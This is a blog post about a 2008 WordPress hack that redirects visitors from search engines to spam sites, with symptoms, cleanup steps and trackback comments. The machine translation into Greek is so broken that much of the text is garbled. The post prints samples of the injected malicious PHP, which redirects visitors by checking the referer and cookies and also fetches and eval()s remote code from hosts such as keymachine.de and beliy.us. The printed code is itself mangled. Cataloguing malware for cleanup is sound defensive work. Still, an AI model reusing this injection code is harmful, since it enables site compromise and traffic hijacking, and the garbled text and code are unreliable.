WordPress σιδηροπρίονο: ξαναβρίσκω και σταθεροποιώ Google και ψάχνω μηχανή ή όχι μπισκότο κυκλοφορία Redirected σε δικό σου-Needs.info, AnyResults.Net, χρυσόs-Info.net και άλλος παράνομος Sites
σιδηροπρίονο είναι μετάβαση όλος έξω σε σιδηροπρίονο και εκμεταλλεύομαι WordPress blogs ξενώνας παντού the web, φυτό και κάνω ένεση κακοβουλία code into WordPress codes και βάση δεδομένων για να redirect επισκέπτες και hits από Google και άλλος ψάχνω μηχανή σε spam sites όπως δικό σου-needs.info, anyresults.net, χρυσόs-info.net, keymachine.de, beliy.us, seogoogle.us και πολλοί άλλος spam sites ότι γέμισα με πληρώνω- ανά- κλικ CPC διαφημίσεις. μερικά σιδηροπρίονο εμφανίζομαι σε στόχος μεγαλύτερος crowd από redirecting όλος χωρίs WordPress μπισκότο. χωρίs been σιδηροπρίονο, αυτοί κυκλοφορία υπέθεσα σε φτάνω στο blog όπως προορισμόs.
Symptoms του ψάχνω μηχανή Redirection σιδηροπρίονο
σημείωση ότι όχι όλος symptoms μπορώ συμβαίνει εντελώς. εκεί μπορώ να είμαι περισσότερο από έναs μεθανόλη του σιδηροπρίονο υπήρξα, ο οποίος contributed σε διαφορετικός εύρημα και πιθανά resolution.
- οποιοσδήποτε κλικ διαμέσου από ψάχνω μηχανή όπως Google, Yahoo, AOL, MSN, Windows ζω ψάχνω αποτέλεσμα, συμπεριλαμβανομένου blog όνομα, θα να είμαι redirected και προωθώ σε σιδηροπρίονο’ sites όπως δικό σου-needs.info, anyresults.net, χρυσόs-info.net, keymachine.de, beliy.us, seogoogle.us, μαζί με λίστα σίγουρος μεγαλώνω. θεατής φτάνω στο σιδηροπρίονο σελίδα μαζί με ίδιος ψάχνω κορδόνι ότι αυτόs ή αυτή συνήθιζα να ψάχνω μέσα ψάχνω μηχανή.
- κλικ επάνω έναs σύνδεσμος στο blog επάνω RSS ταΐζω αναγνώστης όπως Google αναγνώστης μπορώ να είμαι redirected σε σιδηροπρίονο site επίσηs.
- έναs επισκέπτης με όχι λογαριασμός επάνω σε blog, ή όχι login (hence does όχι έχει μπισκότο εντοπισμός από κακοβουλία code), θα να είμαι redirected σε spam sites.
- μόνο επισκέπτομαι από ψάχνω μηχανή είναι been redirected μακριά, και the κόλπο καταφέρνω σε τρελός τριγύρω ίσως πολύ από bloggers, webmasters και site ιδιοκτησία, ή τουλάχιστον καθυστέρηση the εντοπισμός του πρόβλημα.
- ξαφνικός πελώριος και dramatic σταγόνα και χάνω του Λειτουργία ισοδυναμώ με του επισκέπτες κυκλοφορία και σελίδα θέα μέσα web τρακτέρ στατιστικός, ιδιαίτερα κυκλοφορία με Google όπως παρέπεμψα, αν και ψάχνω μηχανή αποτέλεσμα σειρά is intact.
- Λειτουργία σταγόνα του διαφήμιση εισόδημα από Google AdSense ή άλλος διαφημίσεις δίκτυο, ή προσεταιρίζομαι προμήθεια.
- The επόμενος βάση κωδικοποίησα PHP code μπορώ εμφανίζομαι επάνω σε wp-blog-header.php αρχείο:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ όπως $ref) ifstrposstrtolower_SERVERβHTTP_REFERERβ,ref((($[])$)!==λανθασμένος){ $ser1=”?;διάλειμμα; }
εάν && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);έξοδοs; }? > - έναs εικόνα, ο οποίος is μέσα fact έναs μπουκέτο του κακοβουλία PHP code, was αύξησα the wp- περιεχόμενα/ φορτώνω κατάλογος. για παράδειγμα, wp- περιεχόμενα/ φορτώνω/2008/06/06/abcdefghijklmn.jpg, ή αυτό μπορώ να είμαι εσωτερικός δικό σου θέμα ντοσσιέ, i.e. wp-contents/themes/classic/images/xyz.jpg. The όνομα του εικόνα μπορώ να είμαι μέσα στο σχήμα του xxxxxx_old.jpeg.
- έναs είσοδοs was παρενέβαλα μέσα MySQL βάση δεδομένων για WordPress wp_options ενεργοποιώ the εικόνα (the κακοβουλία PHP code) όπως έναs πρίζα, χαρακτηριστικά όπως rss_f541b3abd05e7962fcab37737f40fad8.
- εκεί μπορώ να είμαι επίσηs κακοβουλία codes, ιδιαίτερα εκείνοι ότι διερμήνευσα με εκτιμώ() ή base64_decode() κόμμα been παρενέβαλα into άλλος WordPress PHP αρχείο. παράδειγμα είναι the επόμενος codes:
ifisset_GET'p'(($[])) {
$κάλτσα = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ κάλτσα, ‘ αποκτώ http:/km20725.keymachine.de/ υπηρετώ/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ κάλτσα, ‘ οικοδεσπότηs: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ κάλτσα));
$περιεχόμενα = implode(”, $ περιεχόμενα);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ κάλτσα);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ υπηρετώ/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ υπηρετώ/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress θέμα αυτό είναι όλο been δραστηριοποιημένος και μεταχειρισμένος μπορώ να είμαι έκανα ένεση με σιδηροπρίονο code και επιτηδευμένος επίσηs. τέτοιος code κανονικά υπάρχω μέσα header.php ή index.php του θέμα, και έχει έναs ουρά όμοιος στο υπό
ifserβ1β³($== && sizeof_COOKIE0($)==){ headerβLocation(:
The WordPress ψάχνω κυκλοφορία redirect σε spam site σιδηροπρίονο συμβαίνει ίσως εξαιτίας ασφάλειες τρύπα και ευπάθεια αυτό είναι όλο όχι patched πότε blog ιδιοκτήτηs αποφασίζω όχι αναβαθμίζω σε αργά εκδοχή του WordPress ( παρ΄ όλο που μερικάέκθεση ότι δικό τουs blogs been σιδηροπρίονο αν και αυτού’ ήδη επάνω σε αργά εκδοχή του WordPress 2.5.1). οτιδήποτε η αιτία, εδώ’ the σταθεροποιώ και λύση επιλύω και νικώ the σιδηροπρίονο σε εξασφαλίζω ότι you δικός πλάτη the κυκλοφορία και αποφεύγω been penalized από Google από παράλογος redirecting σε spam σελίδες.
- πλάτη the WordPress βάση δεδομένων.
- χρήση phpMyAdmin βόσκω WordPress MySQL βάση δεδομένων τραπέζι. πηγαίνω στο wp_options τραπέζι, και τότε εκδίδω the κοπηλατώ όνομα active_plugins. The κοπηλατώ λεπτομέρεια όλος ενεργός πρίζα ότι έχει been δραστηριοποιημένος. διορθώνω the λίστα ( μέσα έναs ουρά), και ψάχνω έναs έναs πρίζα όνομα κατέληξα με έναs εικόνα επέκταση, όπως .jpg, .jpeg, .gif και etc. για παράδειγμα, abcdefgh_old.jpeg. σημείωση κάτω the παθητικός στο εικόνα αρχείο.
- χρησιμοποιώνταs sFTP ή SSH ( ξεχνώ για FTP ή Telnet για ασφάλειες), τότε πλοηγώ στο παθητικός του αρχείο, και σβύνω the αρχείο.
- πηγαίνω στο WordPress διαχειριστής πρίζα panel, απενεργοποιώ ή ενεργοποιώ οποιοσδήποτε πρίζα σε καθαρός μακριά the κακοβουλία πρίζα από το “active_plugins” κοπηλατώ.
- πλάτη σε phpMyAdmin, στο wp_options τραπέζι, βρίσκω μια δουλειά κοπηλατώ ότι περιέχω the επόμενος κορδόνι όπως option_name:
rss_f541b3abd05e7962fcab37737f40fad8σβύνω the κοπηλατώ μακριά.
εάν you dont’ γνωρίζω πωs σε τέλειος the βάση δεδομένων καθαρός λεπτομέρεια μέσα βήματα επάνω, εδώ’ έναs video προπαρασκευαστικός:
- πηγαίνω στο wp_users τραπέζι. εάν υπάρχει έναs ονομαστικά user (null αξία μέσα user_nicename χωράφι) δημιούργησα σε 000000:: επάνω 0000-00-00, σημείωση κάτω the user αστυνομική ταυτότητα ( αστυνομική ταυτότητα χωράφι, έναs αριθμόs). σβύνω the user.
- βόσκω the wp_usermeta τραπέζι. τοποθετώ όλος rows με user_id σπίρτα the αστυνομική ταυτότητα του έσβησα παράνομος user. υπάρχουν κανονικά τρία rows been συσχέτισα στο εισβολέας user αστυνομική ταυτότητα. σβύνω όλος the συσχέτισα rows.
- Login στο υπηρετώ σε εκδίδω the θέμα αρχείο, ή βόσκω the θέμα αρχείο’ code μέσα θέμα εκδότηs του WordPress διαχειριστής σχεδιάζω panel. ελέγχω the header.php και index.php για οποιοσδήποτε suspicious code. όπως ανέφερα επάνω, ψάχνω κάτι όμοιος στο ουρά υπό:
ifserβ1β³($== && sizeof_COOKIE0($)==){ headerβLocation(:εάν βρήκα, σβύνω και απομακρύνω the code. σημείωση ότι the κακοβουλία code θα να είμαι διάφορος τιμωρία σε μαθητές να γράφουν το ίδιο πολλές φορές μακρύς μέσα σύνολο.
- εάν αυτού’ όχι ήδη υπήρξα, δημιουργώ έναs κενός index.html αρχείο μέσα στο wp- περιεχόμενα/ πρίζα κατάλογος. The κενό index.html κρύβω the περιεχόμενα του πρίζα κατάλογος, αποτελεσματικόs shield what πρίζα-ins been μεταχειρισμένος από σιδηροπρίονο σε σκληρός και σφιχτός the WordPress ασφάλειες.
- φορτώνω και αντικαθιστώ καθένας και κάθε WordPress αρχείο ( όχι μόνο wp-blog-header.php) επάνω σε υπηρετώ μαζί με φρέσκος, καθαρός, και πρωτότυποςαργά εκδοχή από WordPress (φυσικά, υπερβάλλω λίγο αρχείο όπως wp-config.php και θέματα). εάν δικό σου’ αναβάθμιση, διαβάζω the οδηγόs προσεκτικά.
- αλλάζω δικό σου κωδικός.
- εάν έχειs πολλαπλός users, αλλάζω δικό τουs κωδικός ( ή ζητάω αυτούς σε αλλάζω the κωδικός) επίσηs.
σημαντικός: αυτό είναι ένα πολυβόλο μετέφρασα σελίδα ο οποίος is προμήθευσα " όπως is" χωρίs εγγύηση. πολυβόλο μετάφραση μπορώ να είμαι δύσκολος σε understand. παρακαλώ αναφέρομαιπρωτότυπος ’γγλος άρθρο οποτεδήποτε είναι δυνατόν.
μοιράζομαι και contribute ή αποκτώ τεχνικός υποστηρίζω και βοήθεια σεMy ψηφιακόs ζωή φόρουμ.
Related άρθρο
- προσθέτω NoFollow σχέση σε WordPress Blogroll σε Increase PageRank
- WordPress πρίζα: εκθέτω Google αναλυτικός και FeedBurner έκθεση στατιστικός από Site Admin
- Technorati εισόδημα σύνδεσμος πρίζα για WordPress
- SEO φιλικά Rewrite μεθανόλη σε κινώ Website URL από υποκατάλογος ριζώνω γονιόs ντοσσιέ
- έναs αδέναs σε Google έμπορος ψάχνω
- ακέραιος και εκθέτω Google AdSense για ψάχνω και Co-Op έθιμο ψάχνω μηχανή αποτέλεσμα μέσα WordPress Blog σελίδα φόρμα
- Ask.com ψάχνω μηχανή κριτική από CNNMoney
- οδηγώ περισσότερο κυκλοφορία από χρησιμοποιώνταs εικόνα
- πωs αποφεύγω, Bypass ή διαφεύγω Google κουτί άμμου
- κατεβάζω WordPress 2.3 ελευθερώνω υποψήφιος 1 (RC1) με Tags υποστηρίζω
Entries (RSS)
Ιούνιοs 12th, 2008 1006:
[...] My ψηφιακόs ζωή WordPress σιδηροπρίονο: ξαναβρίσκω και σταθεροποιώ Google και ψάχνω μηχανή ή όχι μπισκότο κυκλοφορία Redi… [...]
Ιούνιοs 12th, 2008 1114:
[...] wersja WP 2.5.1 byΕa naraΕΌona na jakieΕ πρόβλημα. έναs w caΕym tym zamieszaniu, zwanym juΕΌ ψάχνω μηχανή Redirection σιδηροπρίονο, chodzi o przekierowanie ruchu z wyszukiwarek, gΕΓ³wnie Google, choΔ nie tylko, na specjalnie [...]
Ιούνιοs 12th, 2008 1443:
[...] WordPress σιδηροπρίονο: ξαναβρίσκω και σταθεροποιώ Google και ψάχνω μηχανή ή όχι μπισκότο κυκλοφορία Redirected σε δικό σου-Nee… μοιράζομαι ή στέλνω This σε φίλοι σφαίρα: Related ContentWant περισσότερο web λογισμικό κριτική? τότε βεβαιώνομαι you υπογράφω σε δικός μας RSS ταΐζω ή αποκτώ δικός μας customizable widget και θράκα αυτό επάνω δικό σου site! Related ταχυδρομώ WordPress the most μεταχειρισμένος ανοίγω πηγή blog λογισμικό[...]
Ιούνιοs 12th, 2008 1940:
[...] Kalau peringkat blog WordPress kita di Google tetap untuk keyword kita, ταπιόκα pengunjung turun drastis, hati-hati, bisa jadi itu αρκτικό blog kita kena σιδηροπρίονο dan di redirect ke situs spam. [...]
Ιούνιοs 13th, 2008 1200:
[...] My ψηφιακόs ζωή WordPress σιδηροπρίονο: ξαναβρίσκω και σταθεροποιώ Google και ψάχνω μηχανή ή όχι μπισκότο κυκλοφορία Redi… [...]
Ιούνιοs 13th, 2008 1336:
[...] WordPress σιδηροπρίονο: ξαναβρίσκω και σταθεροποιώ Google και ψάχνω μηχανή ή όχι μπισκότο κυκλοφορία Redirected My ψηφιακόs… WordPress σιδηροπρίονο: ξαναβρίσκω και σταθεροποιώ Google και ψάχνω μηχανή ή όχι μπισκότο κυκλοφορία Redirected σε δικό σου-Needs.info, AnyResults.Net, χρυσόs-Info.net και άλλος παράνομος Sites ΓΒ» My ψηφιακόs ζωή (tags: wordpress ασφάλειες) [...]
Ιούνιοs 18th, 2008 2208:
[...] My ψηφιακόs Life WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redi… [...]
July 3rd, 2008 03:08
[...] ca sa-mi dau sema unde e buba, daca nu mi-ar fi spus Eugen intr-o discutie la cafea, ca a gasit un link pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicat un articol cu titlul : [...]
July 15th, 2008 08:10
[...] I caught it early on and made sure to remove all the malicious code.Β Here is nice tutorial on how to clean your site if this were to happen to [...]
July 17th, 2008 10:30
[...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Nee…. [...]
July 25th, 2008 09:49
[...] avere una merda come quella tra le mani.Se siete già stati infestati o pensate di esserlo, qui e qui troverete le specifiche dell’exploit e alcuni consigli utili per [...]